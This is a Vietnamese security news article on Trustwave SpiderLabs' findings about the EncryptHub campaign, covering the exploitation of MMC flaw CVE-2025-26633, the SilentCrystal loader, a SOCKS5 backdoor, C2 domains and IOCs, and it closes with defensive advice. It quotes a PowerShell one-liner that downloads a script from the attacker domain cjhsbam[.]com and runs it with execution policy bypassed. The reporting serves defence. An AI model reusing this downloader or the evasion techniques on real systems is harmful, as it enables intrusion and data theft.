Các nhà nghiên cứu tại Trustwave SpiderLabs đã phát hiện một chiến dịch EncryptHub tinh vi, lợi dụng nền tảng hỗ trợ Brave để phát tán các payload độc hại. Chiến dịch này đặc biệt đáng chú ý khi khai thác lỗ hổng CVE-2025-26633 mới được công bố trong Microsoft Management Console (MMC).

Phân tích Lỗ hổng CVE-2025-26633 (MSC EvilTwin)

Lỗ hổng này, được đặt tên là MSC EvilTwin, cho phép kẻ tấn công thực thi mã tùy ý thông qua các tệp .msc bị thao túng. Kỹ thuật này giúp EncryptHub (còn được biết đến với tên LARVA-208 hoặc Water Gamayun) thâm nhập hệ thống bằng cách kết hợp lừa đảo xã hội và khai thác kỹ thuật.

Kể từ tháng 2 năm 2025, nhóm này đã xâm phạm hơn 618 tổ chức trên toàn thế giới, nhắm mục tiêu vào các lĩnh vực như nhà phát triển Web3 và nền tảng trò chơi như Steam, triển khai cả infostealer và ransomware.

Kỹ thuật Tấn công và Phương thức Phát tán

Trong chiến dịch mới nhất, kẻ tấn công mạo danh bộ phận hỗ trợ IT thông qua các yêu cầu Microsoft Teams. Chúng thiết lập các phiên làm việc từ xa để thực thi lệnh PowerShell, các lệnh này tải và chạy script từ các tên miền độc hại như cjhsbam[.]com.

Khai thác Tệp .msc và Cơ chế Tải Payload

Các script này thả các tệp .msc (một tệp hợp pháp và một tệp đã bị sửa đổi). Tệp sửa đổi thay thế các placeholder như “htmlLoaderUrl” bằng URL máy chủ C2, trỏ đến script build.ps1. Lỗ hổng lỗ hổng CVE-2025-26633 trong MMC được tận dụng để giải quyết đường dẫn, tải payload từ các thư mục lừa đảo như thư mục en-US.

Script thứ cấp build.ps1 thu thập chi tiết hệ thống, giải mã các lệnh được mã hóa AES và triển khai các công cụ như Fickle Stealer. Fickle Stealer là một infostealer dựa trên PowerShell, chuyên nhắm mục tiêu vào các tệp nhạy cảm, ví tiền điện tử và dữ liệu trình duyệt.

# Ví dụ lệnh PowerShell được sử dụng trong giai đoạn đầu tiên
Invoke-WebRequest -Uri "http://cjhsbam[.]com/runner.ps1" -OutFile "$env:TEMPrunner.ps1"
Start-Process PowerShell -ArgumentList "-NoP -NonI -Exec Bypass -File "$env:TEMPrunner.ps1""

Phát triển Arsenal Mã độc EncryptHub

Phân tích của SpiderLabs cho thấy sự tiến hóa của EncryptHub từ các trình tải dựa trên script sang các tệp thực thi biên dịch bằng Golang, bao gồm cả SilentCrystal. SilentCrystal tạo ra các thư mục giả mạo, bắt chước “C:Windows System32” (lưu ý khoảng trống ở cuối) để né tránh phát hiện.

SilentCrystal: Tấn công Nền tảng Hỗ trợ Brave

SilentCrystal lạm dụng nền tảng hỗ trợ Brave bằng cách tải lên các tệp lưu trữ ZIP chứa payload. Nó sử dụng các khóa API được mã hóa cứng để lấy các liên kết tải xuống và thực thi chúng thông qua lỗ hổng CVE-2025-26633 trong MMC. Chiến thuật này lách qua các hạn chế tải lên đối với người dùng mới, cho thấy các tác nhân duy trì tài khoản đặc quyền trên nền tảng để phân phối lén lút.

Backdoor Proxy SOCKS5 (Golang)

Việc khai thác sâu hơn cơ sở hạ tầng C2 đã phát hiện thêm các công cụ Golang khác, chẳng hạn như một backdoor proxy SOCKS5 hoạt động ở chế độ client hoặc server.

• Chế độ client: Nó kết nối với các điểm cuối C2 được mã hóa cứng, chuyển tiếp thông tin máy bao gồm tên người dùng, miền, quyền quản trị, IP công cộng, vị trí địa lý và ISP qua thông báo Telegram để kẻ tấn công đánh giá nhanh chóng.
• Chế độ server: Thiết lập một đường hầm SOCKS5 với chứng chỉ TLS tự ký, sử dụng “Reverse Socks” làm tên chung, tạo điều kiện cho các kết nối đồng thời thông qua goroutines để điều khiển và kiểm soát mở rộng.

Cơ sở hạ tầng C2 và Kỹ thuật Che giấu

Các tên miền liên quan như safesurf.fastdomain-uoemathhvq.workers.dev lưu trữ các payload như pay.ps1. Script này tạo ra lưu lượng truy cập trình duyệt giả mạo để che giấu hoạt động C2, đồng thời hiển thị các cửa sổ bật lên giả mạo như cài đặt “System Configuration”.

SpiderLabs cũng đã xác định rivatalk.net, một trang web hội nghị video giả mạo được đăng ký vào tháng 7 năm 2025. Trang này mạo danh các nền tảng hợp pháp để phân phối các trình cài đặt MSI yêu cầu mã truy cập. Các trình cài đặt này sideload các DLL độc hại thông qua tệp nhị phân ELAM của Symantec, sau đó kích hoạt PowerShell để tìm nạp và thực thi các payload được mã hóa nhằm duy trì kết nối C2 liên tục. Chi tiết thêm về chiến dịch này có thể tìm thấy tại blog của Trustwave SpiderLabs.

Cách tiếp cận đa lớp này nhấn mạnh khả năng thích ứng của EncryptHub, kết hợp các mồi nhử xã hội với các khai thác zero-day để vượt qua các biện pháp phòng thủ. Mối đe dọa mạng này cho thấy tầm quan trọng của việc cập nhật bảo mật liên tục.

Chỉ số Nhận diện Nguy cơ (IOCs)

Dưới đây là các chỉ số nhận diện nguy cơ (IOCs) liên quan đến chiến dịch EncryptHub:

• Tên miền độc hại:
  • cjhsbam[.]com
  • safesurf.fastdomain-uoemathhvq.workers.dev
  • rivatalk.net
• Tệp/Script liên quan:
  • runner.ps1
  • build.ps1
  • pay.ps1
  • Tệp .msc bị thao túng
  • Tệp thực thi SilentCrystal (Golang binary)
  • Backdoor SOCKS5 (Golang binary)

Chiến lược Phòng thủ và Giảm thiểu Rủi ro

Khi các chiến dịch của EncryptHub tăng cường, các tổ chức phải ưu tiên vá lỗ hổng CVE-2025-26633 ngay lập tức. Cập nhật bản vá là biện pháp thiết yếu để ngăn chặn remote code execution. Ngoài ra, cần tăng cường đào tạo người dùng chống lại các cuộc mạo danh và triển khai phân tích hành vi để phát hiện các hoạt động PowerShell và MMC bất thường.

Trustwave nhấn mạnh tầm quan trọng của việc chủ động săn lùng mối đe dọa, phù hợp với các khuôn khổ MITRE, để chống lại các đối thủ ngày càng tinh vi này. Đây là một bước quan trọng để củng cố an ninh mạng tổng thể.